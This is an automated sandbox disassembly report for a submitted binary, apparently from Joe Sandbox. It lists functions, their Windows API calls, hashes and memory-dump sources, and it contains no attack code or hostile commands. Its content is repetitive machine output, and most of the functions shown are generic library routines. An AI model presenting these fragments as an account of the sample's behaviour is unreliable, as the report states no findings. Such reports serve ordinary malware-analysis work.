                                                                                                                                              • Instruction ID: 20045b1a01943ce18175a09da68eb3b3dac957ec16cd292ee12873f349e9aca1
                                                                                                                                              • Opcode Fuzzy Hash: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                                              • Instruction Fuzzy Hash: B861E171B00215AFDB28CF69E88096EBBF5FB44314F64812FE055D3291E738AE85CB18
                                                                                                                                              Function 004334AC Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0044D18C,00000001,?,0044EB90,00000024,00430BA7,00000001,00000100,00000001,?,?,?,?,?,00426A9F), ref: 004334D0
                                                                                                                                              • GetLastError.KERNEL32(?,?,00426A9F,?,00000100,00000001), ref: 004334E2
                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000100,?,?,0044EB90,00000024,00430BA7,00000001,00000100,00000001,?,?,?,?,?,00426A9F), ref: 0043350C
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000100,?,00000000,00000000,00000000,00000000,0044EB90,00000024,00430BA7,00000001,00000100,00000001,?,?), ref: 00433564
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000100,00000000,?,00000000,00000000,00000000), ref: 004335E7
                                                                                                                                              • GetStringTypeA.KERNEL32(?,?,?,00000000,?), ref: 00433679
                                                                                                                                                • Part of subcall function 00427CAC: __lock.LIBCMT ref: 00427CF0
                                                                                                                                                • Part of subcall function 00427CAC: HeapAlloc.KERNEL32(00000008,?,0044CCF0,00000010,0042AF46,00000001,0000008C,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?), ref: 00427D2E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 892864237-0
                                                                                                                                              • Opcode ID: 41b094fe7ede587f8373936e6811044ce6034eab3902943bc4cb143160f58925
                                                                                                                                              • Instruction ID: cbc897700df3d1e1983acaea7c157d6e20f4ecd83cab76d3576f3f0168d9f9c2
                                                                                                                                              • Opcode Fuzzy Hash: 41b094fe7ede587f8373936e6811044ce6034eab3902943bc4cb143160f58925
                                                                                                                                              • Instruction Fuzzy Hash: 26515E71901219EFCF219FA5EC468AF7BB4FF09765F20552BF810A2260D3389A51CF99
                                                                                                                                              Function 0042C3B0 Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,0044D18C,00000001,?,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C3D4
                                                                                                                                              • GetLastError.KERNEL32(?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 0042C3E6
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C448
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,?,00000000), ref: 0042C4C6
                                                                                                                                              • GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 0042C4D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3581945363-0
                                                                                                                                              • Opcode ID: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                                              • Instruction ID: 88f62cd8e99c40129225232f1d9a33b4d453174d8dbd23392fe9350ab2a232bf
                                                                                                                                              • Opcode Fuzzy Hash: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                                              • Instruction Fuzzy Hash: 48410471A00234ABCB229F50EC85AEF3B74FF49B54F60451AF800A7250D738DD91CB98
                                                                                                                                              Function 0043EA5F Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0043EA91
                                                                                                                                              • GetParent.USER32(?), ref: 0043EA9F
                                                                                                                                              • GetParent.USER32(?), ref: 0043EAB2
                                                                                                                                              • GetLastActivePopup.USER32(?), ref: 0043EAC1
                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 0043EAD6
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 0043EAE9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 670545878-0
                                                                                                                                              • Opcode ID: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                                              • Instruction ID: b535a82bad788ac16eb99c34fc1ef6d385c7c7cd006b6a644f81288a5402ee46
                                                                                                                                              • Opcode Fuzzy Hash: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                                              • Instruction Fuzzy Hash: 451191326073316796317BAB9C4472BA6987F6EB61F161126EC04E3384DB68CC02469E
                                                                                                                                              Function 0041AF60 Relevance: 9.0, APIs: 6, Instructions: 45timefileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0041AF78
                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AF90
                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0041AFA4
                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041AFB4
                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AFC8
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041AFCF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileTime$CloseCreateDateHandleLocal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3223929235-0
                                                                                                                                              • Opcode ID: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                                              • Instruction ID: 3d40798e3b81d1430aab252964cec3372e3fcf11f7589a68c7364f8788f44102
                                                                                                                                              • Opcode Fuzzy Hash: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                                              • Instruction Fuzzy Hash: 3F014F76204302BFD704EF64DD49F9B77ACFF8A704F008918F645D6090E6B0A6098BAA
                                                                                                                                              Function 004191B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 00419247
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 00419257
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: %s\Support\$%s\filelist.txt$Cleanup
                                                                                                                                              • API String ID: 1611563598-1950755567
                                                                                                                                              • Opcode ID: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                                              • Instruction ID: bed570faa51ef1bb4b8ee522f0adb72f7e314e0fe85be6cbe2c67c94b7ad8b4a
                                                                                                                                              • Opcode Fuzzy Hash: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                                              • Instruction Fuzzy Hash: 74512570304704ABD310EF658851BEFB7E5AFC9B08F40490EF54957282DF38A9498BAE
                                                                                                                                              Function 00428EC3 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 133COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 00428EFD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: ` H$` H$p!H$p!H
                                                                                                                                              • API String ID: 1807457897-1693277582
                                                                                                                                              • Opcode ID: 0904489f7c4f8298eb0a037346f5490ffeb532e29ab21e5ec4c274cf32337989
                                                                                                                                              • Instruction ID: b150ea7fd820ce53cdd54fd6a90056057f137d992ad756a29ea43e502382cc7b
                                                                                                                                              • Opcode Fuzzy Hash: 0904489f7c4f8298eb0a037346f5490ffeb532e29ab21e5ec4c274cf32337989
                                                                                                                                              • Instruction Fuzzy Hash: AB413630B052758EE710DF64EA8427EBBA2AB06304FA9087FD645D7352CB7D4946C74C
                                                                                                                                              Function 0043BE10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GlobalLocklstrlen
                                                                                                                                              • String ID: System
                                                                                                                                              • API String ID: 1144527523-3470857405
                                                                                                                                              • Opcode ID: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                                              • Instruction ID: eea6c33846d3fd7b44d8b3261e131be6795de2e39f67e8c264ccda5b0592d447
                                                                                                                                              • Opcode Fuzzy Hash: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                                              • Instruction Fuzzy Hash: B441DE32900219EFCB10DFB9C88699EBBB8FF08314F10922AE916D7241DB389945CF94
                                                                                                                                              Function 00426D10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042407C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424096
                                                                                                                                                • Part of subcall function 0042407C: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 004240A7
                                                                                                                                                • Part of subcall function 0042407C: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004240ED
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                                              • GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
